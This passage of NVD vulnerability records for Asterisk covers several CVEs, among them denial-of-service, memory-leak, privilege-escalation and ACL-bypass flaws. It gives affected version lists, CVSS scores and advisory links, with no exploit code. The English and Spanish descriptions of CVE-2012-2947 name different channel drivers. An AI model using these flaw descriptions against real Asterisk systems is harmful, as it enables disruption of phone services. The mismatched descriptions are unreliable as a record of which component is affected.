              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_iax2.c in the IAX2 channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1, when a certain mohinterpret setting is enabled, allows remote attackers to cause a denial of service (daemon crash) by placing a call on hold."
    },
    {
      "lang": "es",
      "value": "chan_skinny.c en el controlador de canal de Skinny (alias SCCP) en Certified Asterisk 1.8.11-cert antes de v1.8.11-cert2 y Asterisk Open Source v1.8.x antes de v1.8.12.1 y v10.x antes de v10.4.1, cuando una determinada opci\u00f3n mohinterpret est\u00e1 habilitada, permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de demonio) mediante la colocaci\u00f3n de una llamada en espera."
    }
  ],
  "id": "CVE-2012-2947",
  "lastModified": "2024-11-21T01:40:00.217",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 2.6,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-06-02T15:55:00.983",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Not Applicable"
      ],
      "url": "http://secunia.com/advisories/49303"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2012/dsa-2493"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1027102"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Not Applicable"
      ],
      "url": "http://secunia.com/advisories/49303"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2012/dsa-2493"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1027102"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-11-09 00:29

Modified

2024-11-21 03:16

Severity ?

5.9 (Medium) - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. A memory leak occurs when an Asterisk pjsip session object is created and that call gets rejected before the session itself is fully established. When this happens the session object never gets destroyed. Eventually Asterisk can run out of memory and crash.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2017-011.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/101765	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27345	Vendor Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201811-11
cve@mitre.org	https://www.debian.org/security/2017/dsa-4076
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2017-011.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/101765	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27345	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201811-11
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2017/dsa-4076

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0
digium	certified_asterisk	13.13.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "88EDB1A9-AC31-4A47-A222-0C4E17274A02",
              "versionEndExcluding": "13.18.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5861B3BC-A35A-4617-A24E-F88D27DBE3F6",
              "versionEndExcluding": "14.7.1",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "651DC4FA-A4EF-40DC-9B54-3ED928A7531A",
              "versionEndExcluding": "15.1.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7233B5A2-E1CE-4B7E-99FA-26369B892B25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "F051FE7D-0695-4552-BC1C-836076825606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2E9DFD7C-9ED1-4561-8AFF-69D98E8E398D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CA8BFAC6-17A7-4B80-B436-0FFA4B9EA22A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "954376A0-A03C-47D9-BC5E-14B005DB3940",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "07BB081F-504D-42E3-9CDE-4005572CA0CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9F379170-DC3B-41B8-B950-7E0E1E6002AD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "338BFA7B-AA84-483F-B298-BC932728E0EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "0A4D417F-485E-4CAD-8542-A22BBA2869E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "61F70CD2-1727-4955-A81B-8927AEF468ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "A9437455-90FB-4F90-B246-A37E558C9CE5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. A memory leak occurs when an Asterisk pjsip session object is created and that call gets rejected before the session itself is fully established. When this happens the session object never gets destroyed. Eventually Asterisk can run out of memory and crash."
    },
    {
      "lang": "es",
      "value": "Se descubri\u00f3 un problema en Asterisk Open Source en versiones 13 anteriores a la 13.18.1, versiones 14 anteriores a la 14.7.1 y versiones 15 antes de la 15.1.1 y en Certified Asterisk 13.13 en versiones anteriores a la 13.13-cert7. Ocurre una fuga de memoria cuando un objeto de sesi\u00f3n pjsip de Asterisk se crea y la llamada se rechaza antes de que la sesi\u00f3n se establezca por completo. Cuando esto ocurre, el objeto de sesi\u00f3n nunca se destruye. Asterisk podr\u00eda quedarse sin memoria y cerrarse de manera inesperada."
    }
  ],
  "id": "CVE-2017-16672",
  "lastModified": "2024-11-21T03:16:48.077",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-11-09T00:29:00.520",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-011.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/101765"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27345"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-011.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/101765"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27345"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-772"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

The DB dialplan function in Asterisk Open Source 1.8.x before 1.8.32, 11.x before 11.1.4.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8 before 1.8.28-cert8 and 11.6 before 11.6-cert8 allows remote authenticated users to gain privileges via a call from an external protocol, as demonstrated by the AMI protocol.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-018.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-018.html	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "9365B811-5620-42F0-9400-5EA49361D2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "E63726F0-3BC6-49E7-BDE9-71196B480149",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "536ECC06-D2DC-474F-AB44-7A8B16ADFC9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6001EFB8-A539-4F3C-B9F3-7A513FA458BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "677AB746-AE4F-46B0-BEE3-82A1FE77271F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1035C6D2-E8FD-4FFA-9AC7-17534609D68C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "DBD12EE0-78F6-450F-9AD9-D64A55377D56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "BFA21D5A-0BC6-45E0-AD84-F91F185275B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9569F80-CCA9-4010-8B72-0BF9F4654150",
              "versionEndIncluding": "1.8.32.0",
              "versionStartIncluding": "1.8.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CDFB271-72DA-4E23-87A0-E50EE633843F",
              "versionEndExcluding": "11.14.1",
              "versionStartIncluding": "11.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The DB dialplan function in Asterisk Open Source 1.8.x before 1.8.32, 11.x before 11.1.4.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8 before 1.8.28-cert8 and 11.6 before 11.6-cert8 allows remote authenticated users to gain privileges via a call from an external protocol, as demonstrated by the AMI protocol."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n DB dialplan en Asterisk Open Source 1.8.x anterior a 1.8.32, 11.x anterior a 11.1.4.1, 12.x anterior a 12.7.1, y 13.x anterior a 13.0.1 y Certified Asterisk 1.8 anterior a 1.8.28-cert8 y 11.6 anterior a 11.6-cert8 permite a usuarios remotos autenticados ganar privilegios a trav\u00e9s de una llamada de un protocolo externo, tal y como fue demostrado por el protocolo AMI."
    }
  ],
  "id": "CVE-2014-8418",
  "lastModified": "2024-11-21T02:19:02.850",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:10.157",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-018.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-018.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

The (1) VoIP channel drivers, (2) DUNDi, and (3) Asterisk Manager Interface (AMI) in Asterisk Open Source 1.8.x before 1.8.32.1, 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8.28 before 1.8.28-cert3 and 11.6 before 11.6-cert8 allows remote attackers to bypass the ACL restrictions via a packet with a source IP that does not share the address family as the first ACL entry.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-012.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-012.html	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "E63726F0-3BC6-49E7-BDE9-71196B480149",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:lts:*:*:*",
